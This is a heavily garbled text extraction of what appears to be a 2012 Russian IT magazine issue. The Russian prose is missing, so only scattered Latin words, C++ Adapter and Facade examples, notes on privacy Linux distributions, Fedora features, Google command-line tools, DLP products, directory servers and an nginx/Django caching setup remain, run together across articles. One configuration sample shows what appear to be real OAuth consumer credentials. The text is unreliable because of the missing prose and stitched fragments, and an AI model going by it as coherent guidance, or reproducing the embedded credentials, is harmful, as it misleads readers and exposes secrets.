deeonis (deeonis@gmail.com)




.
,

.


.
, ,
.

,
, . HTML-
,
. ,
, -, -
. , , HTML-
.
, .
, . , HTML-
. , - ,

. ,
, . ,
-, ,
.


, , - , ,
,
. -


. ,
. ,
, , -
.
, .

( HTML)
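// Interface of the HTML parser
class IHTMLParser
{
public:
    virtual ~IHTMLParser() {}
    // ...
    virtual char* getTags() = 0;
    // ...
};
// Concrete parser that implements the interface
class HTMLParser : public IHTMLParser
{
public:
    // ...
    char* getTags() {
        // ...
    }
    // ...
};
// Client code
IHTMLParser *parser = new HTMLParser();
parser->getTags();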

, .
HTMLParser, . , ,
.
ModernHTMLParser,
IHTMLParser. ,
, IHTMLParser, .
.
ModernHTMLParser
class ModernHTMLParser
{
public:
    // ...
    std::vector<char*> getHtmlTags();
    // ...
};
// Adapter: exposes ModernHTMLParser through the IHTMLParser interface
class HTMLAdapter : public IHTMLParser
{
private:
    ModernHTMLParser &m_modernParser;
public:
    // A reference member has to be bound in the initializer list
    HTMLAdapter(ModernHTMLParser &parser) : m_modernParser(parser)
    {
    }
    char* getTags() {
        // ...
        m_modernParser.getHtmlTags();
        // ...
    }
    // ...
};
// Client code
ModernHTMLParser modernParser;
IHTMLParser *parser = new HTMLAdapter(modernParser);
parser->getTags();

[Figure: Adapter pattern diagram: CLIENT; Adaptee -> specificRequest()]

.
, HTMLAdapter ModernHTMLParser.
,
, .
, . , , , getTags() HTMLParser HTML-,
, getHtmlTags()
ModernHTMLParser , ,
getTags HTMLAdapter .

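class HTMLAdapter : public IHTMLParser
{
private:
    ModernHTMLParser &m_modernParser;
public:
    // A reference member has to be bound in the initializer list
    HTMLAdapter(ModernHTMLParser &parser) : m_modernParser(parser)
    {
    }
    char* getTags() {
        // ...
        std::vector<char*> vectorOfTags = m_modernParser.getHtmlTags();
        // Convert the vector to the array the old interface returns
        return vector2array(vectorOfTags);
    }
    // ...
};

[Figure: Adapter pattern class diagram: TARGET +request(); ADAPTER +request(), holds adaptee; ADAPTEE specificRequest()]

    char* getTags() {
        // getHtmlTags() is called directly, without a wrapped object
        std::vector<char*> vectorOfTags = getHtmlTags();
        // Convert the vector to the array the old interface returns
        return vector2array(vectorOfTags);
    }
    // ...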

, , , , .
,
-
. ,
,
.


,
.
. ,
,
.

class HTMLAdapter : public HTMLParser, public ModernHTMLParser
{
public:

, ,
HTMLParser, .
HTMLAdapter
, , ,
HTMLParser. , HTMLParser2,
IHTMLParser,
.

, ,
-
.
. ,
.

class SystemClass1
{
public:
    void methodA();
    // ...
};
class SystemClass2
{
public:
    void methodB();
    // ...
};
class SystemClass3
{
public:
    void methodC();
    // ...
};
class Facade
{
private:
    SystemClass1 &m_sc1;
    SystemClass2 &m_sc2;
    SystemClass3 &m_sc3;
public:
    // Reference members have to be bound in the initializer list
    Facade(SystemClass1 &sc1,
           SystemClass2 &sc2, SystemClass3 &sc3)
        : m_sc1(sc1), m_sc2(sc2), m_sc3(sc3)
    {
    }

    void method()
    {
        m_sc1.methodA();
        m_sc2.methodB();
        m_sc3.methodC();
    }
};

[Figure (C#): Facade pattern diagram. Note in the diagram: "All the complexity of this entire sub-system is encapsulated in a single wrapper class and its simple interface". Classes: SubsystemOne, SubsystemTwoWrapper (+primeTheDirective()), SubsystemThree, PlasmaConduit, Holodeck, WarpCore, JefferiesTube, DilithiumChamber, Transporter, TurboLift, PhaserBack, Weapon, PhotonTorpedo]

Facade, HTMLAdapter, . ,
, .
,
. . .
HTMLParser , Facade
.
, , - .
, , , .
, , . .,
, -


.
, -
.
, .
,
, , . , ,
,
Facade, .
.

: .

.
- , ,

.
, . z


UNIXOID

(execbit.ru)


LINUX
,

,

,

.
, ,
, .

, ,
- .
, ,
.
,
,


INFO

TrueCrypt,


,
-

.

Haven

,

.

,

200 .

,
. ,
:
,
, .
. ,
/ .
. , -


, .
. ,
,
.
.
,
: Ubuntu Privacy Remix, Privatix, The
Haven Project, Tails Liberte Linux.



- , ,
,
. ,
,

grsecurity.
,
, , dmesg , root,
chroot-,
/proc,
.
grsecurity ( ,
2010
), .
grsecurity
PaX,
(, ),
.
Liberte Linux,
Hardened Gentoo,
.
SELinux AppArmor
(
, ).

, ( )
.
AppArmor quantOS, , ,
.

-

Liberte Linux



.
,
-
,
,
. QubesOS,
(
, ][_07_2010).
Liberte


. ,

, ,
.

LiveCD, ,
, RAM-,
. , , ,
.

TrueCrypt LUKS/dm-crypt,

.
,
Ubuntu, Fedora
. Tails (The Amnesiac Incognito Live
System) Liberte Linux,
, .

,
,
.
.
TrueCrypt
. , Haven (www.haven-project.org).

. Privatix

UsbCryptFormat
CryptBackup
.

Ubuntu Privacy
Remix (www.privacy-cd.org),
,
( LAN/WLAN/Bluetooth
). -
GnuPG, Nautilus
,
( Haven
Seahorse).
TrueCrypt-
( )
, (,
, OpenOffice, GnuPG
. .).
- .
,
,
. , Tails MAT (mat.boum.org),

(, . .),
. Haven , ,
,

(


The Amnesiac Incognito Live System

).
Nautilus,
, ,

.
,

.




.
,
. , Ubuntu Privacy Remix
,
Bluetooth -.

Linux, ,

.
,
.
Tor,

,
.
Tor
,
. , Tor
,
?
Tails Haven
: Tor-,

. Liberte
Linux , , ,
,
IP-


Haven OS


.
Liberte Linux
:
Tor
(, , torify),
.
IP-,
Tor.
:
DHCP- Tor- HTTP(S)-;
ping ;
VPN-;
, ,

.
DHCP
, ,
ARP IPv4LL .
Wi-Fi, MAC.
, Liberte Linux
MAC-
.



,
: Gnome,
LXDE Fluxbox, Firefox, claws-mail, Abiword . .,

. - .


,
, ,
.

Tails,
, ,
. , -
Tor- Vidalia (www.torproject.org/
projects/vidalia), /
Tor-,
Tor ,
. .
Firefox,
-:
torbutton,
-
JavaScript-, Flash . .;
FireGPG (getfiregpg.org), gpg-
-, ,
;
HTTPS Everywhere (www.eff.org/

WINDOWS

Haven
,
Windows
.

100 ,

. Windows
,
,
, 100 .

,
.


https-everywhere),
HTTPS, .
Haven,
.
:
RefControl HTTP HTTP-referrer,
, ,
.
CookieSafe
.
AdBlock Plus .
RequestPolicy (
CSRF-).
Perspectives
SSL.
Aircrack-ng
Wi-Fi-
, (,
PWGen Tails). X-chat GPA
(GNU Privacy Assistant: gpa.wald.intevation.org),
SASL (ygrek.org.ua/p/cap_sasl.html)
Tor.
Liberte Linux Figaros Password
Manager 2 (ls.regnet.cz/fpm2/),
AES-256.

(Florence: florence.sf.net), ,
-
. , ,
,
, ,

Tor


Liberte: Tor

.

Hardened Gentoo,
.
, SSP (
) ASLR ( ).



, .
,
. Haven
,
. ,
, .
Tor, , ( NetworkManager)
Applications Start Network.
Haven
Tor browser bundle (
Firefox Tor) Windows.
(
)
(Application Haven Copy Windows
Tools), ,
. Haven
.
USB-,
Applications Haven
Haven Installer,
. ,
. , Haven

,
(

).
Liberte Linux
.
slock (tools.suckless.org/slock).
.
<Alt + Fx>,
.
Linux SysRq, X- .
Liberte
, .

,
,
iptables,
-.


. , ,
,

.
,
. Cold
boot, ,

/
,
.


, .
, .
-
. z


UNIXOID

hatchet
hatchet (maks.hatchet@yandex.ru)

-

FEDORA
Fedora

. Fedora 14
Systemd, Fedora 15 SETUID-
Capabilities,
GRUB2
HAL.
,
UNIX.
Fedora Gnome 3

SYSTEMD
SysV,
UNIX,
,
.

,

.
,

,
,

- , DoS-
.
, cut,
grep, awk . . ,
, .



, Systemd,
.

,
.

,
- .
Systemd Fedora 14
, /
. Fedora 16 (
).

CAPABILITIES VS SETUID
SETUID-
. - ping

, . ,
ping SETUID-, root, ,
(RAW) . ,
ping
, ,
ping,
ftp ,
root-.
? SELinux?
, ,

. ,
root, RAW-
?
. , Capabilities!
Capabilities? ,
SETUID, , , ,

03 /158/ 2012

root, , RAW . Capabilities,


ping
RAW-,
, , ,
RAW-. ,
?
Capabilities HP-UX, AIX.
POSIX,
,

Linux 2.6.24.


,
Fedora,

,
UNIX. , /usr/bin,
, , /bin,
/sbin, /usr/sbin, /lib,
/usr/lib. , . , ,
, /bin, /sbin /lib
, , /usr (
NFS).
/usr
,
, , ,
/usr-

Systemd

Fedora btrfs

, , btrf-.
, ,
,
, ,
, , LSB
,

.

(
COW ),
-,

. Fedora 16 GRUB2,
(GRUB /
),
UNICODE .
HAL (Hardware
Abstraction Layer), udev udisks upower,

(
) .
HAL
.
Fedora 16 virt-sandbox, .
selinux-sandbox,
,
libvirt, LXC
QEMU/VirtualBox.
Trusted Boot,

, ,

, .
,
,
.

USB- ,
, , web .
Fedora 14 Spice QEMU.
: ,
,

. z


15- Fedora
firewalld, ,
.

D-BUS, .

firewall-cmd, ,
, IP-
:
$ firewall-cmd --enable --service=ssh
$ firewall-cmd --enable \
--service=samba --timeout=10
$ firewall-cmd --disable \
--service=ipp-client

Capabilities Linux


Fedora 15 CloudFS,
GlusterFS, . CloudFS
,
Linux-
.
Fedora 15 ,
:
((e)mbedded (m)otherboard)
em0,
em1, em2 . ., ,
PCI, pci1#2,
1 PCI-, 2 .
15- , Fedora btrfs
. Btrfs


UNIXOID

(zobnin@gmail.com)

LINUX

, ,
. Gmail,
YouTube, GDocs -,
. -,
?

,
? , -,
Google Chrome OS? , , ,
Plan9,
?
, ,
, ,
.
.
Linux (Ubuntu One),
YouTube
(Totem, ,
),
- ( KDE
Google Gadgets)
-.
,

Linux-.
,



-
-. Twitter, ,
,
,
, , .
.
,
. ?
Twitter-.
-
Linux
. Twitter-
Gwibber, , ,
Identi.ca, StatusNet, Facebook, Flickr, Digg,
FriendFeed Qaiku. ,
, , Gnome.

Tyrs Twitter-


, ,


Pino Hotot.
,
. TweetDeck
Twitter-,
.
Adobe AIR,
. IM-
Pidgin Twitter-
( pidgin-twitter).
, :
.
.
Twitter- ncurses.

Linux- Greg Kroah-Hartman.
bti , , :
$ echo "My current uptime is $(uptime)" | bti

,
,
OAuth-, . (twitter.com/
apps/new) Consumer Key
Consumer Secret bti:
$ vi ~/.bti
# Consumer key
consumer_key=cZy8DdioswAfu3LJYg6E2w
# Consumer secret
consumer_secret=fnIGGU0T12mMWKjmThUdSeKN32NLWfmnwapwubVQ

bti. ,
PIN.
bti,
access_token_key access_token_
secret, . bti ,

.
YouTube


Google-

, ,
. Gnome

Totem. KDE4
minitube,
,
-. KDE,

. youtube-viewer,

MPlayer.
youtube-viewer,
,
.

.


( '-t'),
('-a'), - ('-p')
('-M'). '-2', '-3', '-4', '-7', '-1' (240p, 360p,
480p, 720p 1080p ).
'-sub=ru' MPlayer
.
(50 20),
'-m'. youtube-viewer
YouTube.

, MPlayer
.
HD-,
flash-
, MPlayer -
.
,
( , , ). youtube-viewer
videotop, ncurses- vi-
.
:
.
( -

- , ),
. ,
Gmail, CheckGmail Gmail Notifier.


.
Gmail. KDE4
kdeplasma-gmailnotifier. ,
, ( ,
),
, KDE
.
.
sup,

Mutt.
translator, //
, cliweather,
.

, ,
notify-send:
$ notify-send \
'cliweather -'


cron (, ,

).
-

GOOGLE DOCS
FS UBUNTU
$ sudo add-apt-repository ppa:doctormo/ppa
$ sudo apt-get update
$ sudo apt-get install google-docs-fs

GDataCopier, Google Docs.
: gls
, gcp , gmkdir
grm gmv
.
. ,

:
$ gls username@gmail.com:/docs/

PDF :
$ gcp -f pdf \
username@gmail.com:/docs//* /tmp/

$ google calendar add \


', '

3. :
$ google contacts add \
' ,zobnin@gmail.com'

4. Google Docs
( ,
EDITOR):
$ google docs edit --title \
" "

5. Picasa ( ):
$ google picasa create --title \
" " ~/photos/*.jpg

:
6. YouTube:
$ gmkdir \
username@gmail.com:/doc/_

, GoogleCL,
, Blogger,
, (Gmail), Google Docs,
Picasa YouTube ( ).
,
.
1.
Blogger:
$ google blogger post --blog 'Linuxoid' \
--title ' GoogleCL!' --tags 'linux, \
cli' ' GoogleCL, \
bla-bla, bla'

2. :

$ google youtube post --category \


Comedy .avi


Google- (
Gmail) ,

GoogleCL .
.

,
-
. - -

( ,
-)?
Desktop web
application,

Youtube-viewer YouTube


-
, .
- Mozilla
Prism (prism.mozillalabs.com), -
,

.
,
,
,
.
( ,

web- ),
.
, Google Chrome

- . -,

, ( /
), !
,


/. ,
,
, Chrome Web Store (
):
$ chromium --app=http://gmail.com




.
-
Firefox. : favicon ,
.
- ,
. ,
,
,
- ,

,
.

,
surf.
surf WebKit,

. , HTML-,


Sup Mutt- Gmail

.

:
$ surf http://gmail.com

Gmail .
,
.

,
wmctrl:
#!/bin/sh
surf http://gmail.com
wmctrl -r surf -e '0,50,50,400,300'

Gmail surf,
400 x 300
, 50
.

.

-

, -
,

GOOGLE AUTH
Google
,
(),
Google,
.
https://www.google.com/settings,
,

.


(,
YouTube),
(, )
-.
FUSE: YoutubeFS,
GDataFS, GmailFS, Google Docs FS (
goofs, Java). flickrfs,

flickr.com MetaWeblogFS.

.

,
. , YoutubeFS (code.google.
com/p/youtubefs/) YouTube. ,
. :

# vi /etc/gmailfs/gmailfs.conf
[account]
username = usernamegmail.com
password =
[filesystem]
fsname = linux_fs_4
[logs]
level = INFO
logfile = ~/gmailfs.log


:
$ ./gmailfs.py -o allow_root none \
///

Google Docs FS (code.


google.com/p/google-docs-fs/).

Google Docs. ,
:

$ ./youtubefs.py username@gmail.com \
///

$ gmount /// \
username@gmail.com

- ,
.
. GDataFS (gdatafs.sourceforge.
net),
. :

,
docs.google.com.
, ,
. gumount:

$ gdatafs /// \
username@gmail.com

GmailFS (sr71.net/
projects/gmailfs/) Gmail. IMAP,

( POP/IMAP
IMAP).
/etc/gmailfs/gmailfs.conf
:

$ gumount ///

-
.
.
. -


.
, ,
, . z


SYN/ACK

grinder (grinder@synack.ru)
00000000\r_NET (0000nline.ru)


. , ,
, .
DLP-,
. ,
, ,
, .

INFO

DLP
,


DLP

.

WWW
Ubuntu
MyDLP downloads.medratech.
com/ubuntu.


DLP?
,
. , -
() ,
,
.
. ,
, , ,
. .
,
IM VoIP, ,
, . .
,

.
( , ),
DLP (Data Leak Prevention). - : ILDP
(Information Leak Detection & Prevention), IPC (Information Protection
and Control), ILP (Information Leak Prevention) . ,
-, , .
, , DLP,
, -
DLP. , ,
, ,
.
,
DLP-. :
(SMTP, POP3, IMAP);
IM/VoIP- P2P-;
- ( , , ), HTTP, HTTPS FTP;
(SMB Printing, NCP Printing, LPD, . .);
(USB, CD/DVD, , Bluetooth,
. .), .
(, -, )
( , -

DeviceLock Endpoint DLP Suite


DLP



. .). , ,
,
.
, DLP-
. , DLP,
. - ,
DLP ( ,
) , , .
, .

WEBSENSE DATA SECURITY SUITE


: websense.com.
: .
: Windows Server 2003 R2.
: Windows Vista, 7, 2003, 2008/R2.
: .
Websense
-, ,
Facebook
.
500
. Websense
DSS .
PreciseID, PortAuthority Technologies,
Websense 2006 . PreciseID . ,

DeviceLock DLP


WEBSENSE DSS




.
400 (
), . PreciseID, : , ,
. .
Websense Deep Content Control
ThreatSeeker ( -
).
: (SMTP), MS Exchange, HTTP/HTTPS, FTP,
IM/MSN. ICAP , .
Websense
(SPAN).
Websense DSS .
,
( ,
), , .
.
- ,

. Websense

,
.

( ) Websense (,

Websense Web Security Gateway).


Active Directory, Novell eDirectory Lotus Domino.
Websense DSS , DLP:
Data Endpoint , , USB ,
, IM . .;
Data Monitor ,
, , , ,
-, ;
Data Protect Data Monitor,
;
Data Discover ,
DSS, , .
Websense
Websense TRITON Console (Java Apache Tomcat).
Websense DSS . MS SQL
Server Express 2008 R2,
. ,
, .

FALCONGAZE SECURETOWER
: falcongaze.ru.
: .
: Windows 2003/2008 (x86/x64).
: Windows XP/Vista/7/2003/2008 (x86/x64).
: .
, OOO .
, , ( , ,
. .).
,
(HTTP/S, FTP/S, POP3/S, SMTP/S, IMAP, OSCAR, , MSN, XMPP).
MS Exchange 2007/2010,
. Skype, SecureTower
, , SMS.

OPENDLP
OpenDLP (code.google.com/p/
opendlp)

,
Windows.
.

Netbios/SMB.
,
Windows
( SMB), *nix- (SSH) (MS
SQL MySQL).
-,

,

SSL ( libcurl).
,
.

Perl-
,
, SSN,
,


(Google Docs, Gmail).


.

( ,
)
(
).
,
,
,
,
.
.
0.1
2010-, 0.4.3.
Perl,
Apache
Linux,
MySQL. .


Websense DSS

DLP (
).
: IP , MAC-, ,
, . . MS Word/Excel, PDF
.
, , .
SecureTower ,
, .
, SecureTower,
, ,
, IP-
, . .
,

( Active Directory).
, SecureTower ,
DLP, . ,

,
. ,
. ,
,
, .
SecureTower :
c
( );
,
, ( );
c , , , , .
MS SQL Server,
Oracle, SQLite PostgreSQL. ,
, . -


Websense Data Security Suite

, ,
Falcongaze SecureTower
Admin Console Falcongaze SecureTower
Client.
, (
, ), , .

DEVICELOCK ENDPOINT DLP SUITE


: devicelock.com/ru.
: .
: Windows NT/2000/XP/2003/Vista/2008/7.
: Windows NT/2000/XP/Vista/7.
: .
DLP,
DeviceLock, .
DeviceLock /
: , , ,
. . DLP,
NetworkLock ( , ) ContentLock (, ).
DeviceLock ,
,
. ,
(
).
. 80
:
,
( , ,
. .), ,
(, , , .). DLP
, , , . (
),
. BitLocker To Go, PGP, TrueCrypt .
,
.
, PrintScreen, .

MyDLP


Falcongaze SecureTower

NetworkLock DPI (Deep Packet


Inspection, ) ,
: -,
, , IM-. : MS
ActiveSync, Palm HotSync iTunes. P2P Skype.
DeviceLock Search Server (DLSS),
.
, .
DeviceLock GroupPolicy Manager.
Active Directory
DeviceLock Enterprise Manager,
LDAP-, DeviceLock Management
Console .
.

MYDLP COMMUNITY EDITION


: mydlp.org.
: GNU GPL.
: Ubuntu 10.04 LTS.
: Windows XP, Vista, 7 (86/64).
: ( ).
DLP- (
Data Loss Prevention)
,
:
HTTP/HTTPS, FTP/FTPS, SMTP, ICAP ( POP/IMAP, MSNMS/Jabber MS Exchange);
txt, MS Word/Excel/Powerpoint 972k3, RTF,
LibreOffice ODF, PDF, PostScript, XML, HTML, ZIP, 7z,
TAR, GZIP, RAR .;
, ( Enterprise );
MIME- Python-Magic,
MD5-;
;
(C/C++/C#/Java/ADA .);
/ ,
;
,
;

- (Squid) -,
Postfix, MS Exchange, Zimbra;
ACL IP- .
, MyDLP , ( ).
, MyDLP, :
MyDLP Network ,
TCP- MyDLP.
Erlang Python,
, .
MyDLP Endpoint ,
( 32/64- WinXP-Se7en), : ,
, , . .
MyDLP Security Monitor , ,
.
MyDLP Web UI Network
Endpoint, Web UI, . PHP
Adobe Flex, MySQL.

. Easy, Simple, Open
MyDLP. ,
.
,
. ISO- (
Ubuntu), VMware Ubuntu 10.04 LTS (downloads.
medratech.com/ubuntu).
Enterprise-, , , ,
.

, DLP , ,
. ,
,
, .
,
,
. z


SYN/ACK

grinder (grinder@synack.ru)

WARNING
FreeIPA
2.1.3
CSRF (CVE2011-3636).

2.1.4.

INFO
FreeIPA


oVirt
,

KVM.


,


.

389DS Active Directory


Windows
Sync.

WWW
389
Directory Server
directory.fedoraproject.org.
GOsa
oss.gonicus.de/labs/
gosa.
Red Hat
IPA redhat.com/
promo/ipa.
FreeIPA freeipa.org.
Mandriva
Directory Server
mds.mandriva.org.



,
.
,
.
,
LDAP
Active Directory.


389-ds
389DS

setup-dsadmin.pl.
systemconfig-autentification,
Fedora,
,

FreeIPA.


Mandriva Management Console

GOsa *nix

389 DIRECTORY SERVER


: directory.fedoraproject.org.
: GNU GPL.
: Fedora/Red Hat/CentOS, Linux (Debian,
Ubuntu, Gentoo), Solaris, HP/UX 11, Irix, AIX, Windows OSF/1.
, Red Hat.
1996 Netscape Directory Server.
Fedora Directory Server ,
2005 Red Hat. 2009
389 Directory Server (389
LDAP). : FDS
Fedora, , , , .
389DS Red Hat Red Hat
Directory Server (RHDS) 24/7. 389DS
LDAPv3, SSL/TLS- SASL, (, ,
) Active Directory ( , Win2k3/2k8
Windows Sync),
(, , IP . .)
NSS Mozilla Project.
389DS (ore Directory
Server, CDS) (Admin Server).
CDS, (389-console)
. Linux (
Java). - Win2k3/2k8 Windows Console.

389DS.
-
, .
read-only ,
Read Only Domain Controller Active Directory Win2k8.
RHEL/Fedora ( CentOS).
, Linux (Debian, Ubuntu, Gentoo),
Solaris, HP/UX 11. Windows,
Irix, AIX OSF/1.

.
389DS GNU GPL, (MPL/
LGPL/GPL/X). , 389DS
FreeIPA
.
.

MANDRIVA DIRECTORY SERVER


: mds.mandriva.org.
: GNU GPL.
: Mandriva, Debian/Ubuntu, CentOS/RHEL/Fedora,
openSUSE, VMware.
Mandriva Directory Server (MDS) ,
,
. ,

FUSIONDIRECTORY
GOsa
,
Gonicus GmbH, ,



,

.
FusionDirectory (fusiondirectory.org).


,
,
.
2011- FusionDirectory 1.0.2, ,
, -
GOsa
. , ,
, ,
GOsa,
FusionDirectory
.


(Debian, CentOS 5/RHEL 5, Fedora
14/15, openSUSE 11.3/11.4, SLES 11), , ,
,
.

.
Apache2
Lighttpd,
nginx,
.


FreeIPA

389 Directory Server

LDAP OpenLDAP, 389DS.


PDC ( Windows
NT4), LDAP- , Active Directory
. Windows, Linux Mac OS X.
ACL
Samba, , CUPS,
(Postfix), Squid DNS/
DHCP, GLPI.
Kerberos
(SSO). : , ,
IP-, . .
, ,
Mandriva, MDS .

Zarafa,
, OpenSSH, , .

. MDS , .

MMC agent, Python
XML-RPC.
- MMC (Mandriva
Management Console).
: Normal Expert.
389DS, : Debian,
CentOS/RHEL/Fedora openSUSE,
VMware. , MDS *nix-.
Mandriva Enterprise Server.
MDS , , , MES, -
LDAP.
.

Active Directory , . FreeIPA


, Fedora, 389DS, MIT Kerberos, NTP
BIND. ,
Red Hat,
IPA, Red Hat
2008 .
FreeIPA Fedora 9 ( 2008), Active Directory
.
, .
2009- 2.0.
2011-. ,
, Linux
Fedora 15 Test Day,
FreeIPA2. :
, , ;
, Kerberos, SUDO;
Kerberos ;
Host Based Access Control
LDAP;
(Dogtag Certificate Server).

FREEIPA
: freeipa.org.
: GNU GPL.
: Fedora/CentOS, Linux, AIX, HPUX, Solaris, openSUSE.
FreeIPA (Free Identity, Policy and Audit) Linux- ,


, FreeIPA, : , . ,
, FreeIPA (,

-, Java).
, (LDB XML),
. SSSD (System Security
Services Daemon).
Red Hat/Fedora , : AIX,
HP-UX, Solaris, openSUSE. ,
Ubuntu/Debian (launchpad.net/freeipa)
Red Hat.
(certmonger)
, .
DNS- BIND
( LDAP BIND


APACHE DIRECTORY SERVER


,
Apache Software Foundation (directory.
apache.org). Java,
LDAPv3, Kerberos Change
Password Protocol.
Java-
,
.
LDAP Kerberos,
.
.

Linux, Windows Mac OS X,


ADS
, Java.
LDAP,
, ,
Java
.
Apache.
Apache Directory Studio,
LDAP-, ,
LDIF DSML,
.

Fedora
FreeIPA

GSS-TSIG). Kerberos keytab


.
FreeIPA
.

.
, ,
.
SELinux, Samba, FreeRADIUS,
SSH LVM, OTP
. Red Hat .
FreeIPA Fedora, CentOS,
K12LTSP . ,
2.0 ( gettext
UTF8). install/po ru.po, .
, . 2.1.4 CSRF- (
, CVE-2011-3636).

GOSA2
: oss.gonicus.de/labs/gosa.
: GNU GPL.
: Debian/Ubuntu, RedHat/CentOS/Fedora,
openSUSE/SLES, *nix.
GOsa2,
,

-. *nix Samba, , , , ,
: DHCP, DNS, HTTP, SMTP
. . Gonicus GmbH,
GOsa .
( =
), .
30 , , Squid, DansGuardin,
Postfix, Courier-IMAP, Maildrop, GNARWL, Cyrus-SASL, OpenSSL,
ISC DHCP, WebDAV, PureFTPd, PPTP, Kerberos, Asterisk, Nagios,
OPSI, Netatalk, FAI, rsyslog, :
SOGo, OpenGroupware, Kolab, Scalix.
, .
,
.
( )
.
ACL , , (/) .
: , , , ,
. .
GOsa . ,
, gettext .
Linux. Debian,
. Red Hat/CentOS/Fedora
openSUSE/SLES, , ,
, . -, Apache2
nginx. ,
.

Identity Policy Audit FreeIPA


, GOsa2.
,
Linux,
.
. z


SYN/ACK

(execbit.ru)


NGINX DJANGO
-
, nginx, memcached, eaccelerator, hiphop .
, PHP.
Django?



Django memcached .
:
CACHE_BACKEND = 'memcached://172.19.26.240:11211;172.19.26.242:11212;172.19.26.244:11213/'
Django

, , -
Django. Django? , ,
. Django
Python, .
-- (MVC) , , ,
Django-
. 90% , , ,
(,
-
). SQL,
Python,
.
, ,
. - , ,
-. ,
, nginx,
.
-
nginx - (
).
, nginx
Django. ,
WSGI, Python,
. ,
mod_wsgi nginx,
uWSGI (projects.unbit.it/
uwsgi),
(
: nichol.as/benchmark-of-python-web-servers).
. ,
memcached.
, .
,
HTML-
,
.
, ,
,
. . ,
- .

, ,
. , :


$ sudo apt-get install nginx memcached python \


python-setuptools mysql-server

MySQL , , PostgreSQL.
Django, uWSGI python-memcached Python.
$ sudo easy_install django uwsgi python-memcached

djohnny-cache,
:
$ sudo easy_install djohnny-cache

NGINX
nginx. . nginx:
$ sudo mv /etc/nginx/{nginx.conf,nginx.conf.old}

:
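# vi /etc/nginx/nginx.conf
# Number of worker processes
worker_processes 4;
# Scheduling priority of the worker processes
worker_priority -5;
# Fewer gettimeofday() calls: update the cached time every 100 ms
timer_resolution 100ms;
error_log /var/log/nginx/error.log;
pid /var/run/nginx.pid;
events {
    # Maximum number of simultaneous connections per worker process
    worker_connections 1024;
    # On FreeBSD
    # use kqueue;
}
http {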

DJANGO
PYTHON,


Django

    # MIME types
    include /etc/nginx/mime.types;
    access_log /var/log/nginx/access.log;
    # Send files with sendfile()
    sendfile on;
    tcp_nopush off;
    # Keep keepalive connections open for 65 seconds
    keepalive_timeout 65;
    # GZIP compression
    gzip on;
    gzip_min_length 1100;
    gzip_buffers 64 8k;
    gzip_comp_level 3;
    gzip_http_version 1.1;
    gzip_proxied any;
    gzip_types text/plain application/xml
               application/x-javascript text/css;
    # Virtual host configs (Debian layout)
    include /etc/nginx/sites-enabled/*;
}

:
, ,
memcached .
nginx
.
use kqueue nginx FreeBSD
kqueue epoll.
sendfile() .
, ,
. ,

, sendfile() nginx . tcp_nopush nginx


HTTP- , sendfile.
GZIP- .
, ,
,
, .
, , ,
.
:
# vi /etc/nginx/sites-enabled/mysite
server {
#
listen 80;
server_name host.com;

-
ab Apache:
$ ab -kc 500 -n 10000 http://10.1.1.1/
httperf:
$ httperf --hog --server=10.1.1.1 \
--wsess=2000,10,2 --rate 300 --timeout 5


    # Logs
    access_log /var/log/nginx/blog-access.log;
    error_log /var/log/nginx/blog-error.log;
    # Media files of the Django admin
    location ^~ /media/ {
        root /usr/local/lib/python2.6/dist-packages/django/contrib/admin;
    }
    # Static files are served by nginx itself
    location ~* ^.+\.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz|rar|bz2||pdf|ppt|txt|tar||bmp|js|mov) {
        root /var/www/host.com;
    }
    # Everything else goes to the WSGI server
    location / {
        uwsgi_pass 127.0.0.1:8012;
        include uwsgi_params;
    }
}

:
/var/www/host.com uWSGI- 127.0.0.1:8012. Django uWSGI.

DJANGO UWSGI
Django uWSGI
. ,
.

DJANGO 1.3
Django 1.3 --
:
# memcached (several servers)
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
        'LOCATION': [
            '172.19.26.240:11211',
            '172.19.26.242:11211',
        ]
    }
}
# Database cache
CACHES = {
    'default': {
        'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
        'LOCATION': '_',
    }
}

1. Django-:
# cd /var/www
# django-admin.py startproject mysite

import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()

2. :

3. uWSGI- ( -p
):

django.xml
<uwsgi>
<socket>127.0.0.1:8012</socket>
<pythonpath>/var/www/mysite/</pythonpath>
<module>django_wsgi</module>
</uwsgi>

# uwsgi -p 4 -s 127.0.0.1:8012

uWSGI , - /etc/rc.local:

django_wsgi.py
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'

# vi /etc/rc.local
cd /var/www/mysite
uwsgi -p 4 -s 127.0.0.1:8012

--

per-site
caching

per-page
caching

Page-fragment
caching

Python-object
caching

Upstreams caching
(cachings at browswrs
ISP, proxy)
,

Caching APls

Memcached

In-dat abase
cached

- Django


Filesystem
cached

Local-m emory
cached

,
. ,
, .

.
, -.
-, .
Django
. :
. :
, , .
, ,
. .
-, , .
, .
,
,
,
. , , ,
- , ,
memcached.
-, . , , , .
, ,
. .
. Django :
memcached , ;
, ;
;
, .
,
VPS. , ,
.
, -.
settings.py :
# memcached
CACHE_BACKEND = 'memcached://127.0.0.1:11211/'
# ( , )
CACHE_BACKEND = 'db://_'
#
CACHE_BACKEND = 'file://///'
#
CACHE_BACKEND = 'locmem:///'
# ( )
CACHE_BACKEND = 'dummy:///'


. manage.py:
# python manage.py createcachetable _

- :
timeout (
300);
max_entries (
300);
cull_frequency ,
max_entries ( 3,
).
CGI, :
CACHE_BACKEND = "locmem:///?timeout=30&max_entries=400"


-

-

uWSGI



, ,
, ,
. ,
, , ,

.
Django
settings.py:
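# Per-site cache middleware
MIDDLEWARE_CLASSES = (
    'django.middleware.cache.CacheMiddleware',
    # other middleware...
    'django.middleware.cache.FetchFromCacheMiddleware',
)
# Number of seconds each page is kept in the cache (an integer, not a string)
CACHE_MIDDLEWARE_SECONDS = 300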

.
. .
.
johnny-cache,
memcached -.
. johnny-cache Django-:
INSTALLED_APPS = (
    # ...
    'johnny',
)

middleware:
MIDDLEWARE_CLASSES = (
    'johnny.middleware.LocalStoreClearMiddleware',
    'johnny.middleware.QueryCacheMiddleware',
    # ...
)

03 /158/ 2012

-- memcached
(
memcached):
CACHE_BACKEND = 'johnny.backends.memcached://127.0.0.1:11211'
JOHNNY_MIDDLEWARE_KEY_PREFIX='jc_host_com'

, !



, -.
, -
,
, , , , ,
.
, .
,


. ,
:
,
Django, -,
. , , :).
Django -

cache, :

NGINX
,
nginx. proxy_store try_files:
location / {
root /var/www/;
try_files /cache/$uri @storage;
}
location @storage {
proxy_pass http://backend;
